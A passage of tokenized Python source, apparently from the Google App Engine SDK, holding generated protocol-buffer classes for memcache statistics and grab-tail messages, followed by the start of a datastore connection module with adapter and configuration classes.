ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . DOUBLE , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheStatsResponse ( ProtocolBuffer . 
ProtocolMessage ) : <EOL> has_stats_ = <NUM_LIT:0> <EOL> stats_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def stats ( self ) : <EOL> if self . stats_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . stats_ is None : self . stats_ = MergedNamespaceStats ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . stats_ <EOL> def mutable_stats ( self ) : self . has_stats_ = <NUM_LIT:1> ; return self . stats ( ) <EOL> def clear_stats ( self ) : <EOL> if self . has_stats_ : <EOL> self . has_stats_ = <NUM_LIT:0> ; <EOL> if self . stats_ is not None : self . stats_ . Clear ( ) <EOL> def has_stats ( self ) : return self . has_stats_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_stats ( ) ) : self . mutable_stats ( ) . MergeFrom ( x . stats ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_stats_ != x . has_stats_ : return <NUM_LIT:0> <EOL> if self . has_stats_ and self . stats_ != x . stats_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_stats_ and not self . stats_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stats_ ) : n += <NUM_LIT:1> + self . lengthString ( self . stats_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_stats_ ) : n += <NUM_LIT:1> + self . lengthString ( self . stats_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_stats ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_stats_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . 
putVarInt32 ( self . stats_ . ByteSize ( ) ) <EOL> self . stats_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_stats_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . stats_ . ByteSizePartial ( ) ) <EOL> self . stats_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_stats ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_stats_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . stats_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kstats = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGrabTailRequest ( ProtocolBuffer . 
ProtocolMessage ) : <EOL> has_item_count_ = <NUM_LIT:0> <EOL> item_count_ = <NUM_LIT:0> <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_count ( self ) : return self . item_count_ <EOL> def set_item_count ( self , x ) : <EOL> self . has_item_count_ = <NUM_LIT:1> <EOL> self . item_count_ = x <EOL> def clear_item_count ( self ) : <EOL> if self . has_item_count_ : <EOL> self . has_item_count_ = <NUM_LIT:0> <EOL> self . item_count_ = <NUM_LIT:0> <EOL> def has_item_count ( self ) : return self . has_item_count_ <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_item_count ( ) ) : self . set_item_count ( x . item_count ( ) ) <EOL> if ( x . has_name_space ( ) ) : self . 
set_name_space ( x . name_space ( ) ) <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_item_count_ != x . has_item_count_ : return <NUM_LIT:0> <EOL> if self . has_item_count_ and self . item_count_ != x . item_count_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_item_count_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_item_count_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item_count ( ) <EOL> self . clear_name_space ( ) <EOL> self . 
clear_override ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_item_count_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . item_count_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_item_count ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_item_count_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . item_count_ ) ) <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> if self . 
has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kitem_count = <NUM_LIT:1> <EOL> kname_space = <NUM_LIT:2> <EOL> koverride = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheGrabTailResponse_Item ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . 
has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> if ( self . has_flags_ ) : n += <NUM_LIT:5> <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_value ( ) <EOL> self . clear_flags ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . flags_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> if ( self . has_flags_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . 
flags_ ) <EOL> def TryMerge ( self , d ) : <EOL> while <NUM_LIT:1> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:12> : break <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_flags ( d . get32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> if self . has_flags_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . flags_ ) ) <EOL> return res <EOL> class MemcacheGrabTailResponse ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . item_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def item_size ( self ) : return len ( self . item_ ) <EOL> def item_list ( self ) : return self . item_ <EOL> def item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def mutable_item ( self , i ) : <EOL> return self . item_ [ i ] <EOL> def add_item ( self ) : <EOL> x = MemcacheGrabTailResponse_Item ( ) <EOL> self . item_ . append ( x ) <EOL> return x <EOL> def clear_item ( self ) : <EOL> self . item_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> for i in xrange ( x . item_size ( ) ) : self . add_item ( ) . CopyFrom ( x . item ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if len ( self . item_ ) != len ( x . item_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . item_ , x . item_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> for p in self . item_ : <EOL> if not p . 
IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSize ( ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += <NUM_LIT:2> * len ( self . item_ ) <EOL> for i in xrange ( len ( self . item_ ) ) : n += self . item_ [ i ] . ByteSizePartial ( ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_item ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputUnchecked ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def OutputPartial ( self , out ) : <EOL> for i in xrange ( len ( self . item_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT:11> ) <EOL> self . item_ [ i ] . OutputPartial ( out ) <EOL> out . putVarInt32 ( <NUM_LIT:12> ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:11> : <EOL> self . add_item ( ) . TryMerge ( d ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . item_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kItemGroup = <NUM_LIT:1> <EOL> kItemvalue = <NUM_LIT:2> <EOL> kItemflags = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT:value>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STARTGROUP , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . FLOAT , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> if _extension_runtime : <EOL> pass <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> import collections <EOL> import copy <EOL> import functools <EOL> import logging <EOL> import os <EOL> from google . appengine . datastore import entity_pb <EOL> from google . appengine . api import api_base_pb <EOL> from google . appengine . api import apiproxy_rpc <EOL> from google . appengine . api import apiproxy_stub_map <EOL> from google . appengine . api import datastore_errors <EOL> from google . appengine . api import datastore_types <EOL> from google . appengine . api . app_identity import app_identity <EOL> from google . appengine . datastore import datastore_pb <EOL> from google . appengine . datastore import datastore_pbs <EOL> from google . appengine . datastore import datastore_v4_pb <EOL> from google . appengine . runtime import apiproxy_errors <EOL> _CLOUD_DATASTORE_ENABLED = datastore_pbs . _CLOUD_DATASTORE_ENABLED <EOL> if _CLOUD_DATASTORE_ENABLED : <EOL> from google . appengine . datastore . datastore_pbs import googledatastore <EOL> _MAX_ID_BATCH_SIZE = <NUM_LIT:1000> * <NUM_LIT:1000> * <NUM_LIT:1000> <EOL> _DATASTORE_V3 = '<STR_LIT>' <EOL> _DATASTORE_V4 = '<STR_LIT>' <EOL> _CLOUD_DATASTORE_V1 = '<STR_LIT>' <EOL> def _positional ( max_pos_args ) : <EOL> """<STR_LIT>""" <EOL> def positional_decorator ( wrapped ) : <EOL> @ functools . wraps ( wrapped ) <EOL> def positional_wrapper ( * args , ** kwds ) : <EOL> if len ( args ) > max_pos_args : <EOL> plural_s = '<STR_LIT>' <EOL> if max_pos_args != <NUM_LIT:1> : <EOL> plural_s = '<STR_LIT:s>' <EOL> raise TypeError ( <EOL> '<STR_LIT>' % <EOL> ( wrapped . 
__name__ , max_pos_args , plural_s , len ( args ) ) ) <EOL> return wrapped ( * args , ** kwds ) <EOL> return positional_wrapper <EOL> return positional_decorator <EOL> def _GetDatastoreType ( app = None ) : <EOL> """<STR_LIT>""" <EOL> current_app = datastore_types . ResolveAppId ( None ) <EOL> if app not in ( current_app , None ) : <EOL> return BaseConnection . UNKNOWN_DATASTORE <EOL> partition , _ , _ = app_identity . _ParseFullAppId ( current_app ) <EOL> if partition : <EOL> return BaseConnection . HIGH_REPLICATION_DATASTORE <EOL> return BaseConnection . MASTER_SLAVE_DATASTORE <EOL> class AbstractAdapter ( object ) : <EOL> """<STR_LIT>""" <EOL> _entity_converter = datastore_pbs . get_entity_converter ( ) <EOL> _query_converter = datastore_pbs . _QueryConverter ( _entity_converter ) <EOL> def __init__ ( self , id_resolver = None ) : <EOL> if id_resolver : <EOL> self . _entity_converter = datastore_pbs . get_entity_converter ( <EOL> id_resolver ) <EOL> self . _query_converter = datastore_pbs . _QueryConverter ( <EOL> self . _entity_converter ) <EOL> def get_entity_converter ( self ) : <EOL> return self . _entity_converter <EOL> def get_query_converter ( self ) : <EOL> return self . _query_converter <EOL> def pb_to_key ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def pb_v1_to_key ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> v3_ref = entity_pb . Reference ( ) <EOL> self . _entity_converter . v1_to_v3_reference ( pb , v3_ref ) <EOL> return self . pb_to_key ( v3_ref ) <EOL> def pb_to_entity ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def pb_v1_to_entity ( self , pb , is_projection ) : <EOL> """<STR_LIT>""" <EOL> v3_entity = entity_pb . EntityProto ( ) <EOL> self . _entity_converter . v1_to_v3_entity ( pb , v3_entity , is_projection ) <EOL> return self . pb_to_entity ( v3_entity ) <EOL> def pb_v1_to_query_result ( self , pb , query_options ) : <EOL> """<STR_LIT>""" <EOL> if query_options . 
keys_only : <EOL> return self . pb_v1_to_key ( pb . key ) <EOL> else : <EOL> return self . pb_v1_to_entity ( pb , bool ( query_options . projection ) ) <EOL> def pb_to_index ( self , pb ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def pb_to_query_result ( self , pb , query_options ) : <EOL> """<STR_LIT>""" <EOL> if query_options . keys_only : <EOL> return self . pb_to_key ( pb . key ( ) ) <EOL> else : <EOL> return self . pb_to_entity ( pb ) <EOL> def key_to_pb ( self , key ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def key_to_pb_v1 ( self , key ) : <EOL> """<STR_LIT>""" <EOL> v3_ref = self . key_to_pb ( key ) <EOL> v1_key = googledatastore . Key ( ) <EOL> self . _entity_converter . v3_to_v1_key ( v3_ref , v1_key ) <EOL> return v1_key <EOL> def entity_to_pb ( self , entity ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def entity_to_pb_v1 ( self , entity ) : <EOL> """<STR_LIT>""" <EOL> v3_entity = self . entity_to_pb ( entity ) <EOL> v1_entity = googledatastore . Entity ( ) <EOL> self . _entity_converter . v3_to_v1_entity ( v3_entity , v1_entity ) <EOL> return v1_entity <EOL> def new_key_pb ( self ) : <EOL> """<STR_LIT>""" <EOL> return entity_pb . Reference ( ) <EOL> def new_entity_pb ( self ) : <EOL> """<STR_LIT>""" <EOL> return entity_pb . EntityProto ( ) <EOL> class IdentityAdapter ( AbstractAdapter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , id_resolver = None ) : <EOL> super ( IdentityAdapter , self ) . __init__ ( id_resolver ) <EOL> def pb_to_key ( self , pb ) : <EOL> return pb <EOL> def pb_to_entity ( self , pb ) : <EOL> return pb <EOL> def key_to_pb ( self , key ) : <EOL> return key <EOL> def entity_to_pb ( self , entity ) : <EOL> return entity <EOL> def pb_to_index ( self , pb ) : <EOL> return pb <EOL> class ConfigOption ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , validator ) : <EOL> self . 
validator = validator <EOL> def __get__ ( self , obj , objtype ) : <EOL> if obj is None : <EOL> return self <EOL> return obj . _values . get ( self . validator . __name__ , None ) <EOL> def __set__ ( self , obj , value ) : <EOL> raise AttributeError ( '<STR_LIT>' % <EOL> ( self . validator . __name__ , ) ) <EOL> def __call__ ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> name = self . validator . __name__ <EOL> for config in args : <EOL> if isinstance ( config , ( type ( None ) , apiproxy_stub_map . UserRPC ) ) : <EOL> pass <EOL> elif not isinstance ( config , BaseConfiguration ) : <EOL> raise datastore_errors . BadArgumentError ( <EOL> '<STR_LIT>' % ( config , ) ) <EOL> elif name in config . _values and self is config . _options [ name ] : <EOL> return config . _values [ name ] <EOL> return None <EOL> class _ConfigurationMetaClass ( type ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( metaclass , classname , bases , classDict ) : <EOL> if classname == '<STR_LIT>' : <EOL> return type . __new__ ( metaclass , classname , bases , classDict ) <EOL> if object in bases : <EOL> classDict [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> else : <EOL> classDict [ '<STR_LIT>' ] = [ ] <EOL> cls = type . __new__ ( metaclass , classname , bases , classDict ) <EOL> if object not in bases : <EOL> options = { } <EOL> for c in reversed ( cls . __mro__ ) : <EOL> if '<STR_LIT>' in c . __dict__ : <EOL> options . update ( c . __dict__ [ '<STR_LIT>' ] ) <EOL> cls . _options = options <EOL> for option , value in cls . __dict__ . iteritems ( ) : <EOL> if isinstance ( value , ConfigOption ) : <EOL> if cls . _options . has_key ( option ) : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( option , cls . __name__ ) ) <EOL> cls . _options [ option ] = value <EOL> value . 
